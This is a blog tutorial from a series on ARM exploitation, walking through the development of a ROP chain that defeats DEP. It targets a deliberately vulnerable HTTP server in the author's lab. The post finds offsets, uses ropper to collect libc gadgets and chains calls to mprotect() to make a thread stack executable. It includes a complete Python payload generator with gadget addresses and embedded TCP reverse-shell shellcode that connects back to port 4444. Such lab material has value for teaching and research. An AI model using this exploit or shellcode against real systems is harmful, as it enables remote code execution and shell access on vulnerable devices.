ARM Exploitation - Defeating DEP - executing mprotect()

The goal of this part is to go through the whole process of developing a ROP chain against a known vulnerable target. In this case I build a simple vulnerable HTTP server (myhttpd) which runs locally on my armbox on port 8080. We found that the attacked daemon has a stack overflow in the URL parameter. For details on how to build the myhttpd or the lab setup see the first post of this series.

Investigating the memory map

As I already mentioned in the previous article, we need a part of the loaded binary (.text segment, dynamically loaded libary), where we search for gadgets. I used libc for my ROP chain. You can use any other or multiple other parts.

Start your debugger, attach to the vulnerable process and show the memory map:

[root@armbox ~]# r2 -d $(pidof myhttpd)
= attach 757 757
bin.baddr 0x00400000
Using 0x400000
asm.bits 32
 -- Don't look at the code. Don't look.
[0xb6ef862c]> dmm
0x00400000 /usr/bin/myhttpd
0xb68c2000 /usr/lib/libgcc_s.so.1
0xb68ef000 /usr/lib/libdl-2.28.so
0xb6902000 /usr/lib/libffi.so.6.0.4
0xb691a000 /usr/lib/libgmp.so.10.3.2
0xb6988000 /usr/lib/libhogweed.so.4.4
0xb69c6000 /usr/lib/libnettle.so.6.4
0xb6a0d000 /usr/lib/libtasn1.so.6.5.5
0xb6a2d000 /usr/lib/libunistring.so.2.1.0
0xb6ba9000 /usr/lib/libp11-kit.so.0.3.0
0xb6cae000 /usr/lib/libz.so.1.2.11
0xb6cd3000 /usr/lib/libpthread-2.28.so
0xb6cfd000 /usr/lib/libgnutls.so.30.14.11
0xb6e5a000 /usr/lib/libc-2.28.so
0xb6fa5000 /usr/lib/libmicrohttpd.so.12.46.0
0xb6fce000 /usr/lib/ld-2.28.so
[0xb6ef862c]>

The larger the (r-x) segments of the used library / binary are, the better the chances to find good gagets. Choose wisely... :)

I have choosen:

0xb6e5a000 /usr/lib/libc-2.28.so

Investigating the crash

Let's crash the daemon! We will send a long URL to "myhttpd" and inspect the registers and the stack. Check out the following asciinema, make it fullscreen to avoid missing anything.

The daemon crashed and we see PC got overwritten with 0x41414140. What happend? As I explained in the second part of this series , the overflow overwrote the saved LR of a non-leaf function. As soon as this function executed its epilogue to restore the saved values, the saved LR got popped into PC to return to the caller. One note on the least significant bit: the BX instruction basically copies the LSB of the address loaded into PC to the T status bit of the CPSR register, which switches the core between ARM and Thumb mode: ARM (LSB=0)/ THUMB (LSB=1). The saved LR (overwritten with 0x41414141) got popped into PC, then the LSB of the popped address gets written into the CPSR registers T-Bit (bit 5) and finally the LSB of PC itself is set to 0, resulting in 0x41414140.

As we can see R11 also contains our value 0x41414141. That means the overflown function stores and restores LR and R11 onto/from the stack. Some compilers use R11 as reference to point to local variables within a function call (frame pointer):

FP as reference

The variables are then accessed as FP + offset within that function.

Additionally, as we see in the Asciinema, the stack contains 'A'! Therefore we control the values of PC, R11 and we have some space on the stack. Nice.

Lets take a deeper look into the stack. The following lines show the memory of the myhttpd process, after crash:

[0x41414140]> dm
0x00400000 # 0x00401000 - usr     4K s r-x /usr/bin/myhttpd /usr/bin/myhttpd ; loc.imp._ITM_registerTMCloneTable
0x00410000 # 0x00411000 - usr     4K s r-- /usr/bin/myhttpd /usr/bin/myhttpd                    
0x00411000 # 0x00412000 - usr     4K s rw- /usr/bin/myhttpd /usr/bin/myhttpd ; obj._GLOBAL_OFFSET_TABLE
0x00412000 # 0x00433000 - usr   132K s rw- [heap] [heap]                                        
0xb5500000 # 0xb5521000 - usr   132K s rw- unk0 unk0                                            
0xb5521000 # 0xb5600000 - usr   892K s --- unk1 unk1                                                    
0xb56ff000 # 0xb5700000 - usr     4K s --- unk2 unk2                                                    
0xb5700000 # 0xb5f00000 - usr     8M s rw- unk3 unk3                                                    
0xb5f00000 # 0xb5f21000 - usr   132K s rw- unk4 unk4                                                    
0xb5f21000 # 0xb6000000 - usr   892K s --- unk5 unk5                                                
0xb60bf000 # 0xb60c0000 - usr     4K s --- unk6 unk6                                                
0xb60c0000 # 0xb68c2000 - usr     8M s rw- unk7 unk7                                                
[...]
loaded libraries
[...]
0xbefdf000 # 0xbf000000 - usr   132K s rw- [stack] [stack]
0xffff0000 # 0xffff1000 - usr     4K s r-x [vectors] [vectors]

One noticeable thing is that SP (SP = 0xb5efea50) does not point to the section which is advertised as [stack] but to a segment above (address-wise) the mapped libraries:

0xb5521000 # 0xb5600000 - usr   892K s --- unk1 unk1

It will be worth to understand what is happening here. Now, I am not sure why r2's dm (or gdb's vmmap) do not show the (rw-) permissions here - I assume we see the (rw-) mappings of the main process. The used microhttpd library opens a listeners thread, which then opens a worker thread for each new connection.

Check out the following strace to understand what is happening (pid 363 is the listener thread, 370 the worker thread):

[pid   363] mmap2(NULL, 8392704, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0xb56ff000
[pid   363] mprotect(0xb5700000, 8388608, PROT_READ|PROT_WRITE) = 0
[pid   363] clone(child_stack=0xb5efef98, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0xb5eff4c8, tls=0xb5eff920, child_tidptr=0xb5eff4c8) = 370

You can find the whole strace here.

We see that the listeners thread (glibc) is preparing a stack for the thread and assignes an appopriate child_stack to it. It took me some time to get what happend... to visualize the memory map, I made a picture... enjoy:

+------------------+-------------------------------------------------------------------------------------------+
|                  |                                                                                           |
|  No R/W          |                                      ...AAAAAAA               pthread_t, TLS of thread    |
|  permissions     |    mprotect(RW)                                               <-------------------------> |
|                  |                                                                                           |
+------------------+--------------------------------------------------------------+----------------------------+
0xb56ff000      0xb5700000                                          ^             ^                   0xB5F00000
                                                                    |             |
  guard memory                      thread stack growing downwards  |             +
<-----------------> <-----------------------------------------------------------+ 0xb5efef98
                                                                    |             SP of thread at creation
                                                                SP at crash
                                                                 0xb5efea50

mmap2() allocates a chunk of memory (8392704 bytes, starting at 0xb56ff000) with no (---) permissions (see system call mmap2(), parameter PROT_NONE). Then mprotect() adds (rw-) permissions to a section of that memory region, but leaves out a little bit at the start (8388608 bytes starting at 0xb5700000). The threads stack (child_stack paramter of clone()) will point into the (rw-) region. Since stack grows downwards the memory region, with no (rw-) permissions will act as a guard page. Since the stack already grew a little bit, the SP value we observed after the crash points to a address, which is a little bit smaller than the initial child_stack value.

Well, let's summarize: We control the execution flow and also got some memory to store our ROP chain!

Finding the offsets

We already learned in the previous post that knowing about the the stack layout is crucial in building stack overflows. If you have plenty or large local variables stored on the stack, you have to shift your ROP payload many bytes towards higher memory regions, to reach the saved LR. Therefore the next step is to find the right offsets (shifter variable in my overflowgen.py script, I will introduce that soon) to shift the address of our first gadget (and therefore the whole ROP chain and overflow data) exactly where the saved LR resides. Over the years plenty of tools got developed to ease that task, one is included in the metasploit framework (/usr/share/metasploit-framework/tools/pattern_create.rb). But since we are using radare2, like the cool kids, we can use ragg2's included Bruijin pattern generator:

As you can see ragg2 does not avoid putting 1 into LSB (I do not know if metasploit does that, though). Therefore if ragg2 does not find the offset, try with +1, as I did in the video. Our offsets:

PC: 144 Bytes
SP: 148 Bytes

For reference the commandline to generate and query the Bruijin patterns:

BRUIJN=`ragg2 -r -P 250| tr -d '\n'`; echo -e "GET $BRUIJN HTTP/1.1\n" | nc 127.0.0.1 8080

Then you can use ragg2 to query for the found offsets: ragg2 -q 0x....

Exploiting the vulnerability

Depending on the length of your ROP chain you can execute basically all commands which you would otherwise execute in a shellcode. Nonetheless, space on stack might be restricted and moreover it is much simpler to build, test and then execute a shellcode. Now we got two conflicting goals: We got memory space for shellcode on the stack but the stack is only (rw-) - we can't execute it. Well, we already met the systemcall mprotect(), when the worker thread stack was created. Nothing stops us from using that system call again to make the stack (rwx) instead of (rw-) and then execute our shellcode from the stack. Many classic ROP chains use exactly that technique...

Defining the goal: paramters for mprotect()

The prototype of mprotect():

int mprotect(void *addr, size_t len, int prot);

*addr is the address where mprotect() starts to apply the permissions. The result will be: The next len bytes will have, after the call, set the permissions delivered via the prot parameter. The parameter prot has to be a xor of the following values:

32 #define PROT_READ       0x1             /* Page can be read.  */
33 #define PROT_WRITE      0x2             /* Page can be written.  */
34 #define PROT_EXEC       0x4             /* Page can be executed.  */
35 #define PROT_NONE       0x0             /* Page can not be accessed.  */

mman-linux.h

Our target register values then are:

R0: address of thread stack. *addr must be aligned to the systems page size (most commonly 4096 bytes). You want that R0 is smaller than the address, where your shellcode will be loaded.
R1: Some value to make sure our stack will be made executeable.
R2: 0x7

The chaining instruction of our last ROP gadget will point to the address of mprotect() in libc. mprotect() will then return and next our shellcode will be executed. I guess now is a good point to talk about chaining instructions...

Chaining instructions - handling `BX LR`

When I explained the general ROP idea in the second part of this series, I ready dropped two gadgets with different chaining instructions: POP {..., PC} and BLX R4. Then we talked about leaf and non-leaf functions, compared their epilogues and found that BX LR is used in leaf functions to return back to the caller. Certainly these instruction is also used as the chaining instructions of a gadget. Since we can't be too picky with gadgets, we have to use what we get as gadgets.

I think at this point it should be pretty how we chain gadgets (if not see the previous post) like POP {..., PC}. But how do we handle BX LR? One way would be to prepare the LR register each time with the next gadgets address before using a gadget, which uses BX LR as chaining instruction. That would be certainly possible, but pretty costly in matters of space and not very effective. A more elegant way is to point LR to a gadget which does something like POP {PC}, so that we can use BX LR gadgets just by pushing the address of the next gadget on the stack. A simple example:

Execution flow:

LR: 0xaaaaaaaa

    +-------+ 0xaaaaaaaa : pop {pc}    <-----+ 2)
    |                                        +
 3) |         0xbbbbbbbb : mov r0, #1337, bx lr <---------+ 1)
    |
    +------>  0xcccccccc : mov r2, r1, pop {r11, pc}

Stack layout while execution:

              SP
              +  0xa...     0xc...
              | +--->   +---------->
              v
+---------------------+-------+------------------------------+
|             |   0x  | JUNK  | value|                       |
|             |   cc  | value | for  |                       |
|             |   cc  | for   | PC   |                       |
|             |   cc  | R11   |      |                       |
|             |   cc  |       |      |                       |
+-------------+-------+-------+------+-----------------------+
0x0                                                         0xF

We want to first execute the gadget at 0xbbbbbbb, then the gadget at 0xcccccccc. LR points to the gadget at 0xaaaaaaa. When a gadget uses BX LR as chaining instruction, BX LR will jump to 0xaaaaaaaa, POP the value at SP into PC and therefore continue the execution there. In our example we prepared the ROP chain in a way that 0xaaaaaaaa POPs the address 0xcccccccc into PC. Each time we use a BX LR gadget now, we can push the following gadgets address on the stack and therefore chain them in a more convinient way.

Sometimes there are chaining instructions which use BL in any combination, like BLX R7. When we can't avoid using such a gadget, we have to restore our value in LR to point again to 0xaaaaaaa, since the BL instruction will update LR with PC+4.

For all other chaining instructions I assume the instructions show what has to be done and how the ROP chain has to be prepared to chain gadgets successfully.

Using ropper

How do we find gadgets? You can manually dissect and disassemble them using objdump... but thats a pain. Let me introduce ropper:

ropper can be easily installed in a python virtualenv. Check the GitHub for instructions.

I'll let the following asciinema explain the most important features:

The parameter /1/ specifies the quality of the found gadgets, which basically stands for the number of instructions per gadget. /1/ will find gadgets, where the first instruction matches the seach parameter and the second is the chaining opcde. /2/ will consequently find additionally gadgets, which have a second instruction before the chaining one. You can use these instructions too, as long as they do not interfere with your ROP chain...

Ropper shows the offsets of the found instructions inside the searched binary. In the first section of this post we already had a look where in memory the libraries reside. To use the gadgets from within libc we will add the offset roppers shows us to the base address, we already found out.

As you already know ARM instructions are 32 bit long, Thumb instructions only 16 bit. We can use this fact and interprete 32 bit ARM instructions as 16 bit Thumb instructions by just splitting them in half. Ropper does that automatically, if we set arch ARMTHUMB. Beware: As you can see in the asciinima above, if we set ARMTHUMB as architecture, ropper will show us two columns of offsets (red and green). The green one is the one you want to choose as offset. You will note that the LSB of the green addresses is 1, so the core will automatically jump to Thumb mode when the gadget is executed.

ROP ROP ROP

Next step is build the ROP chain, which

sets up R0, R1 and R2 in a way that the stack region of our threat is going to be remapped (rwx) after mprotect() was called
call mprotect()
jump to our shellcode on stack

Currently I do not think that it would be very helpful to explain the hole ROP chain. If you want an explanation, contact me and I will add one. Until then, I hope the embedded comments and the following bullet points are sufficient.

My ROP chain comments notation:
- (7): new (7th) gadget
- (7 p1): parameter 1 to gadget (7)
- ergo: "(15 p1): (16) mov r0, #56" means that parameter 1 of gadget 15 is the address of gadget (16).
Preparing the mprotect() call
- How to prepare R0: load SP + 4 into R0 (11), align value to 4096 (page size on my system) (14) by calculating R0 && R1 (0xFFFFF001 - LSB of SP will always be 0). R1 got initiialized by gadget (9 p2).
- How to prepare R1: load with 0x01010101 (15 p1)
- How to prepare R2: Load 0xFFFFFFFF-0x29 into R6 (3 p4), ADD 0x31 (= 0x7) (4). Then move R6 to R2 (6)
- mprotect() is then called in (15 p2)
when mprotect() returns, it will execute our prepared BX LR slide, which will execute POP {PC} and load the address of the last gadget from the stack. The last gadget (16) is then executed: BLX SP. Since SP now points to our shellcode, which is appended directly to our ROP chain, we that will execute the shellcode.
The shellcode I used is from Azerias great tutorial on ARM shellcode - in this case it is the TCP reverse shellcode, which connects back to port 4444. I changed the connectback IP to 192.168.250.1. That means the exploited myhttpd process will connect back to a netcat listener on my host system.

The other gadgets, which are part of my ROP chain (see below in the script) are used to set up the BX LR slide, restore it, prepare values, and so on...

The ROP chain is embedded in my overflowgen.py script (see below), which should make ROP chain developement easier. Take your time to understand the script and its features, like --human print and --httpencode. You can read about I use --human in the next section.

The first few variables (shift, shellcode, fmt, base) depend on your environment. During this post we found the values for base, shift (offset). Check them and make sure you understand what they do and how we found them during this tutorial.

You can find the ROP chain I used to exploit myhttpd as overflow variable in the following script.

#!env python
import struct
import sys
import argparse
from urllib.parse import quote_from_bytes

parser = argparse.ArgumentParser()
parser.add_argument('--human', help='print overflow string human readable', action='store_true', default=False)
parser.add_argument('--httpencode', help='HTTP encode overflow data (not pre_out() and post_out() data', action='store_true', default=False)
args = parser.parse_args()

# <I little endian unsigned integer
# adjust to your CPU arch
global fmt
fmt='<I'

# base address in the process memory of the library you want to use for your ROP chain
base=0xb6e5a000

# how many bytes should we shift? memory: [shift*"A"+data()+lib(),...]
shift=144
shifter = [bytes(shift*'A','ascii'),'shifter']
shellcode = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x52\x40\x49\x40\xc2\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\xc0\xa8\xfa\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58'

def pre_out():
    print("GET ", end='')

def post_out():
    print(" HTTP/1.1\r\n\r\n\r\n", end='')

def data(data, cmt=''):
    return [struct.pack(fmt,data),cmt]

def lib(offset, cmt=''):
    return [struct.pack(fmt,base+offset),cmt]

def out(data):
    data = [d[0] for d in data]
    b = bytearray(b''.join(data))
    pre_out()
    sys.stdout.flush()
    if shellcode != '':
        for x in shellcode:
            b.append(x)
    if args.httpencode:
        b = quote_from_bytes(b)
        print(b, end='')
    if not args.httpencode:
        sys.stdout.buffer.write(b)
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()

def out_human(data):
    pre_out()
    sys.stdout.flush()
    b = '['
    for d in data:
        b+='0x'+d[0].hex()+' = '+d[1]+'|'
    if shellcode != '':
        b += shellcode.hex()
    b += ']'
    print(b,end='')
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()

if args.human:
    fmt = '>I'

overflow =  [
        shifter,
        # prepare BX LR slider, chaining with r3
        lib(0x00103251), # (1): 0x00103250 (0x00103251): pop {r3, r7, pc};
        lib(0x0000220f,'r3'), # (1 p1): prepare r3 for gadget (3) 0x0000220e (0x0000220f): pop {r0, r3, r4, r6, r7, pc};
        data(0x56565656,'r7'), # (1 p2): JUNK
        lib(0x0005c038,'pc'), # = (1 p3: ) (2): 0x0005c038: pop {lr}; bx r3;
        lib(0x000db435,'lr'), # = (2 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
        # / prepare BX LR slider
        lib(0x00024cb4,'r0'), # (3 p1) (5:) and r0, r0, #1; bx lr;
        lib(0x00103251, 'r3'), # (3 p2) (7:) restore lr,
        data(0x54545454,'r4'), # (3 p3) # JUNK
        data(0xFFFFFFFF-0x29,'r6'), # (3 p4):  value for (4) gadget
        data(0x57575757,'r7'), # (3 p5)
        lib(0x00012f6f,'PC'), # (3 p6) (4:) adds r6, #0x31; bx r0;
        lib(0x0003ea84), # (5 p1 bx lr) (6:) mov r2, r6; blx r3;
        lib(0x00116b80), # (7: p1) (9:) 0x00116b80: pop {r1, pc};
        data(0x57575757), # (7 p2)
        lib(0x0005c038,'pc'), # = (7 p3: ) (8:) 0x0005c038: pop {lr}; bx r3; (2)
        lib(0x000db435,'lr'), # = (8 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
        data(0xFFFFF001, 'r1'), #( 9 p1)
        lib(0x00103251), # (9 p2) (10:) 0x00103250 (0x00103251): pop {r3, r7, pc};

        lib(0x00103251,'r3'),  # (10 p1) (11:) 0x00103250 (0x00103251): pop {r3, r7, pc};
        data(0x56565656,'r7'), # (10 p2)
        lib(0x00107cb4, 'PC'), # (10 p3) add r0, sp, #4; blx r3;

        lib(0x00024e54, 'R3'), # (11 p1), (13:) #0x00024e54: and r0, r0, r1; bx lr;
        data(0x57575757,'r7'), # (11 p2)
        lib(0x0005c038,'pc'), # (11 p3: ) (12): 0x0005c038: pop {lr}; bx r3;
        lib(0x000db435,'lr'), # (12 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};

        lib(0x00116b80), # (13 p1) (14:) 0x00116b80: pop {r1, pc};
        data(0x10101010, 'r1'), # (14 P1)
        lib(0x000d22d0,'PC'), # (14 p2) mprotect
        lib(0x00034d1d,'PC') # blx sp

        ]

if args.human:
    out_human(overflow)
else:
    out(overflow)

Download the script here.

ROP chain developement process

My process is currently as follows:

I only add one gadget at a time.
Before sending the payload to the vulnerable process I attach my debugger.
I set up the new gadget in a way that PC is going to be something known, the same for chaged registers.
After I executed the payload I inspect the registers to check if the gadget was successfully executed.

To ease that task I added a --human option to my script, which basically prints our the following output:

[root@armbox ~]# python overflowgen-myhttpd.py  --human
GET
[0x41[...]1414141414141414141414141 = shifter|0xb6f5d251 = |0xb6e5c20f = r3|0x56565656 = r7|
0xb6eb6038 = pc|0xb6f35435 = lr|0xb6e7ecb4 = r0|0xb6f5d251 = r3|0x54545454 = r4|0xffffffd6 = r6|
0x57575757 = r7|0xb6e6cf6f = PC|0xb6e98a84 = |0xb6f70b80 = |0x57575757 = |0xb6eb6038 = pc|
0xb6f35435 = lr|0xfffff001 = r1|0xb6f5d251 = |0xb6f5d251 = r3|0x56565656 = r7|0xb6f61cb4 = PC|
0xb6e7ee54 = R3|0x57575757 = r7|0xb6eb6038 = pc|0xb6f35435 = lr|0xb6f70b80 =
|0x10101010 = r1|0xb6f2c2d0 = PC|0xb6e8ed1d = PC|01308fe213ff2fe102200121921ac827513701df041c0aa14a701022023701df3f27201c491a01df201c012101df201c022101df04a052404940c2710b2701df02ff115cc0a8fa012f62696e2f736858] HTTP/1.1

After adding a gadget you can human-print your payload and check if the registers match with the planned values.

General Obversations

Be well aware: Not all registers are equal – at least on the used libc. Move something into R0 is easy...

(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov r$count,%" 2>/dev/null| grep ':' | wc -l; let count=count+1; done

search mov R0, any

R0: 88
R1: 14
R2: 7
R3: 8
R4: 1
R5: 1
R6: 2
R7: 1
R8: 0
R9: 0
R10: 0
R11: 0
R12: 0

... moving something out, maybe not so:

(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov %, r$count" 2>/dev/null| grep ':' | wc -l; let count=count+1; done

search mov any, R0

R0: 0
R1: 3
R2: 6
R3: 8
R4: 13
R5: 32
R6: 25
R7: 10
R8: 8
R9: 7
R10: 5
R11: 3
R12: 4

Thats only one example and only ARM (not ARMTHUMB), nonetheless interesting.

Another important point is: the less registers you pullute with your values, the better. As you saw earlier you might need registers which are "stack bound" – especially in processes which create threads, these might be rare.

Action

<< previous post of this series | soon...?